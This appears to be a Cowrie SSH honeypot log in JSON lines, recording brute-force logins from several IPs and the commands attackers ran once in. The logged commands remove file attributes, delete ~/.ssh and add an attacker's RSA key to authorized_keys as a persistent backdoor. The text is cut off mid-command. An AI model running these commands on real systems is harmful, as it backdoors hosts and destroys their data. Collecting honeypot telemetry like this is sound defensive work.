{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":47184,"dst_ip":"1.2.3.4","dst_port":22,"session":"29d284b21e3b","protocol":"ssh","message":"New connection: 211.22.25.164:47184 (1.2.3.4:22) [session: 29d284b21e3b]","sensor":"my-vps","timestamp":"2025-09-09T03:51:15.913419Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:51:15.915090Z","src_ip":"211.22.25.164","session":"29d284b21e3b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:51:16.155426Z","src_ip":"211.22.25.164","session":"29d284b21e3b"}
{"eventid":"cowrie.login.failed","username":"pi","password":"1234","message":"login attempt [pi/1234] failed","sensor":"my-vps","timestamp":"2025-09-09T03:51:17.158416Z","src_ip":"211.22.25.164","session":"29d284b21e3b"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:51:18.400615Z","src_ip":"211.22.25.164","session":"29d284b21e3b"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":40600,"dst_ip":"1.2.3.4","dst_port":22,"session":"5719dadcf96f","protocol":"ssh","message":"New connection: 51.81.118.153:40600 (1.2.3.4:22) [session: 5719dadcf96f]","sensor":"my-vps","timestamp":"2025-09-09T03:51:42.624032Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:51:42.624910Z","src_ip":"51.81.118.153","session":"5719dadcf96f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:51:42.720724Z","src_ip":"51.81.118.153","session":"5719dadcf96f"}
{"eventid":"cowrie.login.failed","username":"redhat","password":"111111","message":"login attempt [redhat/111111] failed","sensor":"my-vps","timestamp":"2025-09-09T03:51:43.145240Z","src_ip":"51.81.118.153","session":"5719dadcf96f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:51:44.244435Z","src_ip":"51.81.118.153","session":"5719dadcf96f"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":40490,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ab2fd5ef6d2","protocol":"ssh","message":"New connection: 152.32.190.168:40490 (1.2.3.4:22) [session: 3ab2fd5ef6d2]","sensor":"my-vps","timestamp":"2025-09-09T03:52:09.676445Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:52:09.677325Z","src_ip":"152.32.190.168","session":"3ab2fd5ef6d2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:52:09.884258Z","src_ip":"152.32.190.168","session":"3ab2fd5ef6d2"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"1","message":"login attempt [sonar/1] failed","sensor":"my-vps","timestamp":"2025-09-09T03:52:10.753564Z","src_ip":"152.32.190.168","session":"3ab2fd5ef6d2"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:52:11.962256Z","src_ip":"152.32.190.168","session":"3ab2fd5ef6d2"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":56814,"dst_ip":"1.2.3.4","dst_port":22,"session":"b520e8dc90c7","protocol":"ssh","message":"New connection: 211.22.25.164:56814 (1.2.3.4:22) [session: b520e8dc90c7]","sensor":"my-vps","timestamp":"2025-09-09T03:52:29.626011Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:52:29.626930Z","src_ip":"211.22.25.164","session":"b520e8dc90c7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:52:29.866527Z","src_ip":"211.22.25.164","session":"b520e8dc90c7"}
{"eventid":"cowrie.login.failed","username":"tester","password":"tester@2025","message":"login attempt [tester/tester@2025] failed","sensor":"my-vps","timestamp":"2025-09-09T03:52:30.865226Z","src_ip":"211.22.25.164","session":"b520e8dc90c7"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:52:32.107724Z","src_ip":"211.22.25.164","session":"b520e8dc90c7"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":48298,"dst_ip":"1.2.3.4","dst_port":22,"session":"5ab385639e5a","protocol":"ssh","message":"New connection: 51.81.118.153:48298 (1.2.3.4:22) [session: 5ab385639e5a]","sensor":"my-vps","timestamp":"2025-09-09T03:52:54.590296Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:52:54.591238Z","src_ip":"51.81.118.153","session":"5ab385639e5a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:52:54.689626Z","src_ip":"51.81.118.153","session":"5ab385639e5a"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa12345678.","message":"login attempt [root/Aa12345678.] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:52:55.119883Z","src_ip":"51.81.118.153","session":"5ab385639e5a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:52:55.363053Z","src_ip":"51.81.118.153","session":"5ab385639e5a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:52:55.363734Z","src_ip":"51.81.118.153","session":"5ab385639e5a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:52:55.365043Z","src_ip":"51.81.118.153","session":"5ab385639e5a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:52:55.463037Z","src_ip":"51.81.118.153","session":"5ab385639e5a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:52:55.674639Z","src_ip":"51.81.118.153","session":"5ab385639e5a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T03:52:55.675332Z","src_ip":"51.81.118.153","session":"5ab385639e5a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T03:52:55.777459Z","src_ip":"51.81.118.153","session":"5ab385639e5a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:52:55.778541Z","src_ip":"51.81.118.153","session":"5ab385639e5a"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":48310,"dst_ip":"1.2.3.4","dst_port":22,"session":"83d55fd849d2","protocol":"ssh","message":"New connection: 51.81.118.153:48310 (1.2.3.4:22) [session: 83d55fd849d2]","sensor":"my-vps","timestamp":"2025-09-09T03:52:55.874153Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:52:55.875098Z","src_ip":"51.81.118.153","session":"83d55fd849d2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:52:55.974124Z","src_ip":"51.81.118.153","session":"83d55fd849d2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T03:52:56.403688Z","src_ip":"51.81.118.153","session":"83d55fd849d2"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:52:57.503669Z","src_ip":"51.81.118.153","session":"83d55fd849d2"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":48322,"dst_ip":"1.2.3.4","dst_port":22,"session":"4170599f9c12","protocol":"ssh","message":"New connection: 51.81.118.153:48322 (1.2.3.4:22) [session: 4170599f9c12]","sensor":"my-vps","timestamp":"2025-09-09T03:52:57.593540Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:52:57.594424Z","src_ip":"51.81.118.153","session":"4170599f9c12"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:52:57.688641Z","src_ip":"51.81.118.153","session":"4170599f9c12"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:52:58.107998Z","src_ip":"51.81.118.153","session":"4170599f9c12"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:52:58.204242Z","src_ip":"51.81.118.153","session":"4170599f9c12"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:52:58.207635Z","src_ip":"51.81.118.153","session":"5ab385639e5a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56340,"dst_ip":"1.2.3.4","dst_port":22,"session":"44c15f4cffb1","protocol":"ssh","message":"New connection: 212.227.235.229:56340 (1.2.3.4:22) [session: 44c15f4cffb1]","sensor":"my-vps","timestamp":"2025-09-09T03:53:09.438606Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:53:09.440265Z","src_ip":"212.227.235.229","session":"44c15f4cffb1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:53:09.915964Z","src_ip":"212.227.235.229","session":"44c15f4cffb1"}
{"eventid":"cowrie.login.success","username":"root","password":"Pa$$W0rd!","message":"login attempt [root/Pa$$W0rd!] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:53:11.821668Z","src_ip":"212.227.235.229","session":"44c15f4cffb1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:53:12.713946Z","src_ip":"212.227.235.229","session":"44c15f4cffb1"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:53:12.714628Z","src_ip":"212.227.235.229","session":"44c15f4cffb1"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:53:12.715560Z","src_ip":"212.227.235.229","session":"44c15f4cffb1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:53:13.168645Z","src_ip":"212.227.235.229","session":"44c15f4cffb1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:53:14.028338Z","src_ip":"212.227.235.229","session":"44c15f4cffb1"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa 